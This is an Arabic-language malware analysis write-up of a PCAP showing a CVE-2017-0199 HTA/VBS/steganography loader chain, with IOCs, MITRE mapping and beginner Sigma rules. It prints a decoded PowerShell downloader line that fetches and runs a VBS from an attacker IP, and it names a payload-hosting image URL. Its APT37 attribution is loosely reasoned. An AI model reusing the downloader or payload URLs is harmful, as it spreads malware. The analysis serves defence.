
CVE-2017-0199 XLS --> HTA --> VBS --> إخفاء البيانات --> برمجية خبيثة بأسلوب DBATLOADER/GULOADER
تحليل قائم على PCAP | التاريخ: 2025-03-12 | المؤلف: BlackOclock
14.1 ملخص سلسلة الهجوم الكاملة
14.2 مؤشرات الاختراق (عناوين IP، التجزئات، النطاقات)
14.3 التوصيات
ملاحظة!!! في هذا التحليل، تم استخدام ملف PCAP 'فقط'! لم تكن ملفات ZIP مطلوبة؛
##1. نظرة عامة على التحليل

الشكل 1: ملفات المصدر التي تم تنزيلها في malware-traffic-analysis.net - تم استخدام ملف PCAP 'فقط' \
2025-01-09 (الخميس): CVE-2017-0199 XLS --> HTA --> VBS --> إخفاء المعلومات (Steganography) --> برمجيات خبيثة من نمط DBATLOADER/GULOADER
##2. تحليل حركة المرور الشبكية
2.1-التسلسل الهرمي للبروتوكولات – الصورة الكبيرة

بدأت بالتسلسل الهرمي للبروتوكولات للحصول على نظرة شاملة لحركة المرور. يوضح هذا حجم كل بروتوكول مستخدم. كما يظهر في الشكل، يمثل TLS 82.4% من إجمالي حركة المرور. بالإضافة إلى ذلك، توجد بيانات Media Line و Line-Based أيضًا. ومع ذلك، لفهم نشاط الشبكة بشكل أفضل، نحتاج إلى فحص المحادثات ونقاط النهاية.
2.2-المحادثات – أعلى المتحدثين ونقل البيانات

نستخدم المحادثات للكشف عن أزواج عناوين IP التي لديها أكبر كمية نقل بيانات بينها. يُظهر التحليل أن 10.9.1.101 (المضيف) و 104.17.201.1 لديهما أعلى حجم حركة مرور. تم استخدام المنافذ 80 و 443 لنقل البيانات هذه. بالإضافة إلى ذلك، نرى أنه تم نقل 3 ميغابايت من البيانات إلى 10.9.1.101 (المضيف) من 104.17.201.1. نتيجة حاسمة أخرى هي الاتصال على المنفذ 21 بسبب الاتصال من عنوان IP الخاص بشبكة WAN (89.39.83.184)، مما يشير إلى احتمال تسرب البيانات. لكننا لسنا متأكدين الآن، لأننا لا نعرف عنه بعد. نحتاج دليلاً!
2.3- نقاط النهاية

نستخدم نقاط النهاية لتحديد أعلى المتحدثين على الشبكة. 104.17.201.1 لديه 3 ميغابايت من البيانات المرسلة (Tx) وأيضًا 10.9.1.101 لديه 3 ميغابايت من البيانات المستلمة (Rx). بالإضافة إلى ذلك، أعلى المتحدثين هم 104.17.201.1 كمصدر و 10.9.1.101 كوجهة.
2.4- كائنات تصدير HTTP

يُستخدم التصدير لتحديد الملفات والبيانات ورسائل البريد الإلكتروني وما إلى ذلك المنقولة عبر الشبكة. في كل مرة نحلل فيها pcap، يجب علينا التحقق هنا لمعرفة الحزم التي تحتوي على أي بيانات. حسنًا، لاحظنا الحزم 88,132,2457 و 2468.
2.5- عامل تصفية HTTP Contains

إذا كانت هناك بروتوكولات HTTP على الشبكة. يجب علينا التحقق من png, zip, jpg, jpeg (الإخفاء) كوسائط في عامل التصفية، لأن المهاجمين غالبًا ما يستخدمون أكوادًا خبيثة في ملفات الوسائط لتجاوز اكتشاف برامج مكافحة الفيروسات.
#مثال: http contains ".png" أو http contains ".jpg" أو http contains ".jpeg" أو http contains ".zip"
نحن نرى فقط لماذا هذا الفلتر مهم عندما يتم استخدام المنفذ 80 على الشبكة. هنا يوجد ملف .hta تم إرساله عبر ملفات الوسائط في الحزمة 47. ولكن عند استخدام التصدير لتحديد الملفات، لم يكن موجودًا.
##3. تحليل NetworkMiner

يمكننا استخدام networkminer لتحديد الملفات بشكل أسرع على PCAP. إذا كنت تستخدم REMnux أو نظام Linux، يمكنك كتابة الأمر في الطرفية ( networkminer pcap_name )
الإطار = 47 | اسم الملف = seemebestthingsevermeetgivenbestthingsfornewways | الامتداد = .hta | الحجم = 47 كيلوبايت | عنوان IP المصدر = 192.3.27.144 الإطار = 132 | اسم الملف = comonstraints | الامتداد = .vbs | الحجم = 223 كيلوبايت | عنوان IP المصدر = 107.172.31.5 الإطار = 2457 | اسم الملف = foeMMBIG | الامتداد = .txt | الحجم = 325 كيلوبايت | عنوان IP المصدر = 107.172.31.5

تجزئات JA3:
06843d66057fc9cbe42e9d690308903 (الإطار 8)62136a81b5b727d039d8160d188863aa (الإطار 14)3c4eb72b882d4d1442c67ce73f1292a9 (الإطار 140)بصمات JA4:
t13d1516h2_8daaf6152771_02713d6af862t13d201000_2b729b4bf63_29829a46703fحسنًا، لكن لماذا نحتاج إلى تجزئات JA4 و JA3؟ قد يكون هناك سؤال: ما هما JA3 و JA4؟
دعني أشرح؛ JA3 و JA4 هما تقنيات تستخدم لبصمة عملاء وخوادم TLS بناءً على معايير المصافحة TLS. يقوم JA3 بإنشاء تجزئة MD5 لحزمة client hello لمصافحة TLS، مما يحدد بشكل فريد تطبيق العميل (مثل المتصفح، البرمجية الخبيثة).
JA4 هي تقنية أحدث. إنها مثل بصمة لحركة مرور الإنترنت. تمامًا كما يمتلك البشر بصمات أصابع فريدة، يترك كل برنامج يتصل بالإنترنت بصمة فريدة. مفيدة جدًا للعثور على خادم C2.
##4. تحليل سجلات Zeek (ZUI)
تم استخدام سجلات Zeek للتحقق من الملفات المستخرجة من حركة مرور HTTP. يُظهر files.log الإدخالات التالية:
تم استخدام هذه التجزئات لاحقًا لعمليات البحث في VirusTotal.

Hta (seemebestthing…)
MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63

MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882

MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
##5. الملفات المستخرجة والتحليل الثابت
هنا سنقوم بتصدير جميع الملفات من pcap على سطح المكتب وسنقوم بتحليلها باستخدام binwalk

ملف HTA يبدو نظيفًا. لم أتمكن من العثور على أي بيانات مخفية. يبدو كملف نصي عادي.
ملف VBS مختلف. وجدت شيئين بداخله:
بعض بيانات Base64 ومستند HTML هذا يعني أن ملف VBS له طبقات متعددة. حاول المهاجم إخفاء الكود بداخله.
ملف TXT أعطاني مخرجات غريبة. تقول "رأس Broadcom"، وهو ما لا معنى له لملف نصي. ربما الملف تالف، أو هناك طبقة أخرى بداخله. أحتاج إلى تشغيله في بيئة اختبار معزولة (sandbox) لفهم المزيد
##6. الفرز والتحليل السلوكي
قمت بتشغيل ملف HTA في بيئة اختبار معزولة. إليك ما حدث:

لدينا نتيجة hta. النتيجة 8/10 بواسطة Triage.

سلسلة العمليات بـ 5 خطوات: mshta.exe (PID 1080) بدأ ثم شغل cmd.exe (4952) ثم شغل cmd.exe powershell.exe (4424) قام PowerShell بتمكين SeDebugPrivilege (للوصول إلى عمليات أخرى) تم استخدام WriteProcessMemory عدة مرات لحقن الكود
سلسلة الحقن:
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → عملية غير معروفة (3332)
قام PowerShell أيضًا بفحص العمليات الجارية (اكتشاف) والنظر في لغة النظام (ربما لتجنب بيئات الاختبار المعزولة).
تقنيات MITRE التي رأيتها لـ hta :
T1059.001 (PowerShell) T1059.003 (cmd) T1057 (اكتشاف العمليات) T1134 (التلاعب بالرموز) T1055 (حقن العمليات) T1614.001 (كشف اللغة)

حسنًا، نرى هنا FromString64Base في أمر PowerShell بواسطة cmd.exe. علينا فك تشفيره على CyberChef لرؤية الكود في base64.

في أمر PowerShell، وجدت سلسلة Base64. بعد فك تشفيرها باستخدام CyberChef، رأيت هذا:
URLDownloadToFile(0, "http://107.172.31.5/comonstraints.vbs", "...", 0, 0) Start-Sleep(3) Invoke-Expression "..."
هذا يعني أنه من 107.172.31.5 يتم تنزيل comonstraints.vbs ثم الانتظار 3 ثوانٍ ثم تشغيله. حسنًا، في الخطوة التالية سيتم تنزيل comonstraints.vbs.

لدينا نتيجة vbs. النتيجة 10/10 بواسطة Triage.
سلسلة العمليات: تم تشغيل Wscript.exe وقام بتشغيل PowerShell.exe
حسنًا، في الصورة إذا تحققنا من الأكواد في العملية. يمكننا مشاهدة #x#.GIBMMeof/5.13.271.701//:p##h ----> يوجد مسار مشفر . http://107.172.31.5/foeMMBIG.txt (الذي ظهر في تصدير PCAP)
وأيضًا هذا الموقع https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg، والذي يحتوي على كود خبيث داخل jpg. يحتوي JPG على علامات <BASE64_START> و <BASE64_END>. بينهما، مما يعني أن هناك كودًا مخفيًا. النص المخفي هو في الواقع Base64 ولكن مكتوب بشكل معكوس. يقوم النص البرمجي أولاً بعكس النص ثم فك تشفيره. بعد فك التشفير، يصبح برنامجًا صغيرًا (تجميعة .NET) ويتم تشغيله على الكمبيوتر.
حاولت تنزيل jpg.

لكن لم أتمكن من الحصول عليه. ربما تم إغلاق هذا العنوان. يقوم ملف VBS بتنزيل صورة، ويجد كودًا مخفيًا بداخلها، ويصلحه، ويشغله. هذا يسمى الإخفاء (Steganography) – إخفاء الأشياء داخل الصور.
تقنيات MITRE:
T1012 - استعلام التسجيل T1082 - اكتشاف معلومات النظام T1055 - حقن العمليات T1057 – اكتشاف العمليات T1134 – التلاعب برموز الوصول

هذا يؤكد أن foeMMBIG.txt هو في الواقع أداة تنزيل برامج فدية.
تقنيات MITRE:
##7. تحليل حقن العمليات
7.1 شجرة العمليات
mshta.exe (1080) → cmd.exe (4952) → powershell.exe (4424) → csc.exe (4432) → Notepad.exe (4600)
7.2 أحداث WriteProcessMemory
كتب PID 1080 (mshta.exe) إلى PID 4952 (cmd.exe) كتب PID 4952 (cmd.exe) إلى PID 4424 (powershell.exe) كتب PID 4424 (powershell.exe) إلى PID 4432 (csc.exe) كتب PID 4432 (csc.exe) إلى PID 3332 (غير معروف)
7.3 التلاعب بالرموز
قام PowerShell (PID 4424) بتمكين SeDebugPrivilege، مما سمح له بالوصول إلى عمليات أخرى.
##8. تحليل تفريغ الذاكرة
عند تشغيل البرمجية الخبيثة، أخذت بيئة الاختبار المعزولة لقطات ذاكرة لـ PowerShell (PID 4424). تحفظ هذه اللقطات ما كان في ذاكرة الوصول العشوائي (RAM) في تلك اللحظة.
وجدت أكثر من 20 ملف تفريغ ذاكرة

ملف VBS (الذي تم تشغيله بواسطة WScript.exe، PID 1184) أنشأ أيضًا تفريغات ذاكرة. هذه التفريغات يبلغ حجمها 64 كيلوبايت في الغالب. هذا طبيعي للتخصيصات الصغيرة. لكنني تحققت من وجود تفريغات ذاكرة لـ Notepad.exe (PID 4600)، لكن لم يكن هناك أي منها. هذا مثير للاهتمام لأننا نعلم أن Notepad تم استخدامه لفتح foeMMBIG.txt.
##9. كشف C2 وبصماته

تم طباعة Jarm فقط من عنواني IP
استخرجت بصمات JA4 من NetworkMiner وبحثت عنها في GreyNoise. وجدت 26 عنوان IP تم الإبلاغ عنها كخبيثة بنفس بصمة JA4. ثم بحثت عن جميع عناوين IP هذه في Shodan لفحص منافذها وخدماتها المفتوحة.
تم إنشاء هذه القائمة عن طريق فحص GreyNoise، وهذه العناوين IP تم الإبلاغ عنها كخبيثة في GreyNoise:
34.122.147.229 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 7 أشهر شارك عنوان IP هذا في 1222 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1177)، تسجيل دخول Fortinet (45). أول ظهور: 2024-05-07 23:10 UTC، آخر ظهور: 2025-07-17 17:28 UTC. 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث. Not After: 2020-11-30 22:10:40 )
107.189.1.175 - نتيجة Shodan C: لوكسمبورج المؤسسة: Buy VM المنافذ المفتوحة: 80 / 443 / 9001 / 9030
104.197.69.115 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 5 أشهر شارك عنوان IP هذا في 1159 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1124)، تسجيل دخول Fortinet (35). أول ظهور: 2024-07-11 04:26 UTC، آخر ظهور: 2025-09-25 12:08 UTC. 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث )
34.72.176.129 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ 5 أشهر
شارك عنوان IP هذا في 1233 حدثًا عبر نوعين متميزين من الهجمات. الهجمات: فحص منفذ TCP (1201)، تسجيل دخول Fortinet (32). أول ظهور: 2024-07-11 04:26 UTC، آخر ظهور: 2025-09-25 12:12 UTC.
ابحث عن مزيد من المعلومات على CrowdSec CTI - وفقًا لمصدر CrowdSec - منذ سنة واحدة
السلوكيات: محاولة استغلال / هجوم القوة الغاشمة HTTP / زحف HTTP + 2 إضافية. التفاصيل الكاملة على CrowdSec CTI
6/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث
34.123.170.104 (محاولات اختراق القوة الغاشمة لتطبيق الويب - وفقًا لمصدر Guardpot - منذ شهر واحد شارك عنوان IP هذا في 1141 حدثًا عبر 3 أنواع متميزة من الهجمات. الهجمات: فحص منفذ TCP (1097)، تسجيل دخول Fortinet (42)، تسجيل دخول ويب (2). أول ظهور: 2024-05-23 14:07 UTC، آخر ظهور: 2026-01-26 05:22 UTC. ابحث عن مزيد من المعلومات على CrowdSec CTI - وفقًا لمصدر CrowdSec - منذ سنة واحدة السلوكيات: زحف HTTP / رفض الخدمة HTTP / استغلال HTTP + 1 إضافية. التفاصيل الكاملة على CrowdSec CTI ) 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث
121.127.42.69 ( 3/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث)
185.220.101.2 نتيجة Shodan ( أسماء المضيفين: berlin01.tor-exit.artikel10.org الدولة: ألمانيا المؤسسة: Artikel10 e.V. مزود خدمة الإنترنت: Stiftung Erneuerbare Freiheit (إنه TOR) المنافذ: 80/443/9001/9002
185.220.101.162 ( أسماء المضيفين: tor-exit-162.relayon.org الدولة: ألمانيا / المؤسسة: CIA TRIAD SECURITY LLC مزود خدمة الإنترنت: Stiftung Erneuerbare Freiheit)
205.169.39.24 فحص المنافذ الشبكية والاستطلاع - وفقًا لمصدر Guardpot - منذ 8 أشهر شارك عنوان IP هذا في 86 حدثًا عبر نوع هجوم واحد. الهجمات: فحص منفذ TCP (86). أول ظهور: 2024-08-22 22:29 UTC، آخر ظهور: 2025-07-04 17:29 UTC.
47.254.76.66 ( موفر السحابة: Alibaba Cloud الدولة: الولايات المتحدة المنافذ المفتوحة: 22 نظام التشغيل: Linux
47.251.118.89 (موفر السحابة: Alibaba Cloud الدولة: الولايات المتحدة المنافذ المفتوحة: 22 نظام التشغيل: Linux)
##10. تحليل تسرب البيانات
عند التحقق من 89.39.83.184، نرى أن هذا ip يتصل على المنفذ 21 مع المضيف. إذا نقرنا على إحدى الحزم على 21 ftp و Follow --- > TCP STREAM، نرى البريد الإلكتروني وكلمة المرور للمهاجم

عند التحقق من الملفات في networkminer، كان هناك أرقام حزم 2498 (PW_user1_DESKTOP.html) و 2516 (Contacts_Thunder.txt). بعد تصدير تلك الملفات، توجد معلومات اسم المستخدم وكلمة المرور لهجوم التصيد (أعتقد) أو سرقة الحسابات.

قمت بالبحث عن عنوان IP لخادم FTP (89.39.83.184) على Shodan لمعرفة المزيد عن بنية المهاجم.

##12. الاستخبارات التهديدية
12.1 نتائج VirusTotal وMalwareBazaar
تم فحص التجزئات التي تم الحصول عليها من سجلات Zeek (القسم 4) على VirusTotal وMalwareBazaar. تم تأكيد أن جميع الملفات خبيثة:
ملف HTA: اكتشاف بنسبة 33/61، تم التعرف عليه كـ AgentTesla ملف VBS: اكتشاف بنسبة 31/62، تم التعرف عليه كـ AgentTesla / Talu ملف TXT: اكتشاف بنسبة 25/62، تم التعرف عليه كـ Zapchast / Bhgd (أداة تنزيل برامج فدية)
انظر القسم 14.2 للحصول على قائمة التجزئات الكاملة.
12.2 رسم خريطة MITRE ATT&CK
T1059.001 - PowerShell T1059.003 - cmd T1134 - التلاعب بالرموز T1614.001 - كشف اللغة T1012 - استعلام التسجيل T1082 - اكتشاف معلومات النظام T1055 - حقن العمليات T1057 – اكتشاف العمليات
12.3 الارتباط بـ APT37 (ScarCruft)
لماذا يبدو هذا الهجوم مثل APT37؟
ما رأيناه في هذا الهجوم - يشتهر APT37 به تم استخدام ملف HTA لبدء العدوى - يستخدم APT37 ملفات HTA كثيرًا PowerShell مع أوامر base64 - يحب APT37 PowerShell الإخفاء (JPG مع كود مخفي) - يخفي APT37 الكود في الصور حقن العمليات (mshta → cmd → powershell → csc) - يحقن APT37 الكود في العمليات الموثوقة تسريب FTP للبيانات المسروقة - يسرق APT37 بيانات الاعتماد والملفات برامج فدية في النهاية - يستخدم APT37 الآن أيضًا برامج فدية الأهداف ربما في أوروبا - ينشط APT37 في أوروبا الاستنتاج تتطابق التقنيات التي رأيناها في هذا الهجوم مع ما يفعله APT37 عادةً. إنه ليس دليلاً بنسبة 100%، لكنه يبدو مثل APT37. من المحتمل أن تكون مجموعة قرصنة كورية شمالية وراء ذلك.
##13. هندسة الكشف
title: SeDebugPrivilege في PowerShell description: يكتشف PowerShell الذي يمكّن SeDebugPrivilege (احتمال التلاعب بالرموز) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: 'SeDebugPrivilege' condition: selection
title: تسريب FTP description: يكتشف اتصالات FTP من عمليات لا ينبغي لها استخدام FTP logsource: category: network_connection product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\cmd.exe' - '\wscript.exe' DestinationPort: 21 condition: selectiontitle: PowerShell Download description: يكتشف PowerShell وهو يقوم بتنزيل الملفات من الإنترنت logsource: category: process_creation product: windows detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains|all: - 'URLDownloadToFile' - 'http' condition: selection
title: Notepad من Temp description: يكتشف فتح المفكرة لملفات من مجلد Temp (احتمال حقن عملية) logsource: category: process_creation product: windows detection: selection: Image|endswith: '\notepad.exe' CommandLine|contains: '\Temp' condition: selection
ملاحظة! أعلم أن هذا أساسي ولكني أحاول تعلم قواعد سيغما.
##14. الخلاصة ومؤشرات الاختراق (IOCs)
14.1 ملخص سلسلة الهجوم الكاملة
بدأت الإصابة بملف HTA ضار تم تنزيله من 192.3.27.144. عند فتحه، أطلق سلسلة من العمليات:
mshta.exe → cmd.exe → powershell.exe → csc.exe → Notepad.exe
النتائج الرئيسية:
<BASE64_START> و <BASE64_END>.
استخرج السكربت هذه البيانات، عكسها، وفك تشفيرها إلى تجميع .NET. تم تحميل هذا التجميع في الذاكرة وتنفيذه. على الرغم من أننا لم نتمكن من تنزيل JPG (خطأ 401)، إلا أن الكود يشير بقوة إلى أن هذه هي الآلية التي قامت بتنزيل الحمولة النهائية (foeMMBIG.txt).جهة التهديد: APT37 – التقنيات تطابق TTPs المعروفة
14.2 مؤشرات الاختراق
عناوين IP:
IP = 107.172.31.5 | الدور = خادم C2 (تنزيل VBS، TXT) IP = 89.39.83.184 | الدور = خادم تسريب FTP IP = 192.3.27.144 | الدور = مصدر تنزيل HTA IP = 104.17.201.1 | الدور = تنزيل المرحلة الأولى (3 ميجابايت) 25 عنوان IP ضار من GreyNoise | انظر القائمة الكاملة في القسم 9.2
النطاقات:
النطاق = res.cloudinary.com الدور = إخفاء المعلومات (JPG مع كود مخفي) النطاق = ip-api.com اسم الملف = index.B23BDC8E.txt(false) الدور = التحقق من التهرب من بيئة الاختبار
تجزئات الملفات:
(seemebestthing…).hta MD5 e90ae8ec16ea2056caaa64ac13a31373 SHA1 8041abda3769b97d8e8b980c6a77fcd2829d715 SHA256 df215a01f6a83014a148c6e407cdc8422e9119a88b4220a1321b2986ea9aef63
comostraints.vbs MD5 3f691c4d5e1b53d16964d30e35863f77 SHA1 9ade8197b6f8828f384d5431a1d3a1b00e162782 SHA256 a666a99f2056082802f4597f180f891582a527324a16d34b4755ed63e5467882
foeMMBIG.txt MD5 9409dc8763c7d40af120ad693545ef98 SHA1 bec5f3f43449189ebf5dadf314288acace4828d7 SHA256 018648727f760e361eb4efa7f955a7815a197224c23016b321ab954767b45b82
بيانات اعتماد FTP:
14.3 التوصيات
107.189.12.7( أسماء المضيفين: tor.privatebrowsing.org الدولة: لوكسمبورج المنافذ المفتوحة: 80)
47.88.18.245 ( الدولة: الولايات المتحدة نظام التشغيل: Linux المنفذ المفتوح: 22)
79.127.248.2 ( 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث الدولة: الولايات المتحدة)
185.126.82.201( الدولة: الولايات المتحدة المنفذ: 1080)
45.92.19.139 (الدولة: الولايات المتحدة المنفذ: 59511)
47.251.186.126( الدولة: الولايات المتحدة المنفذ: 22)
79.127.221.66 (الدولة: الولايات المتحدة المنفذ: 1080)
185.241.208.136 ( الدولة: بولندا أسماء المضيفين: ns2.rdp.rs المنافذ المفتوحة: 111/8440/9001)
47.89.246.29 ( الدولة: الولايات المتحدة المنفذ: 22)
185.220.101.110 ( أسماء المضيفين: tor-exit-110.digitalcourage.de المنافذ المفتوحة: 80/123/443/8080)
5.77.252.202 ( أسماء المضيفين: host-202.252.77.5.ucom.am الدولة: أرمينيا المنافذ المفتوحة: 1701/8291)
124.198.132.172(Tor) ( الدولة: الولايات المتحدة المنافذ المفتوحة: 111/8110/9001)
185.220.101.9 (Tor) ( اسم المضيف: berlin01.tor-exit.artikel10.org الدولة: بولندا المنافذ المفتوحة: 80/443/9001/9002)
213.230.93.13 ( 4/94 من بائعي الأمان أبلغوا عن عنوان IP هذا كخبيث الدولة: أوزبكستان)
138.199.140.203 ( اسم المضيف: static.203.140.199.138.clients.your-server.de الدولة: ألمانيا المنافذ المفتوحة: 22 / 8080 / 8443 / 9090/ 9100 / 10000 / 10250)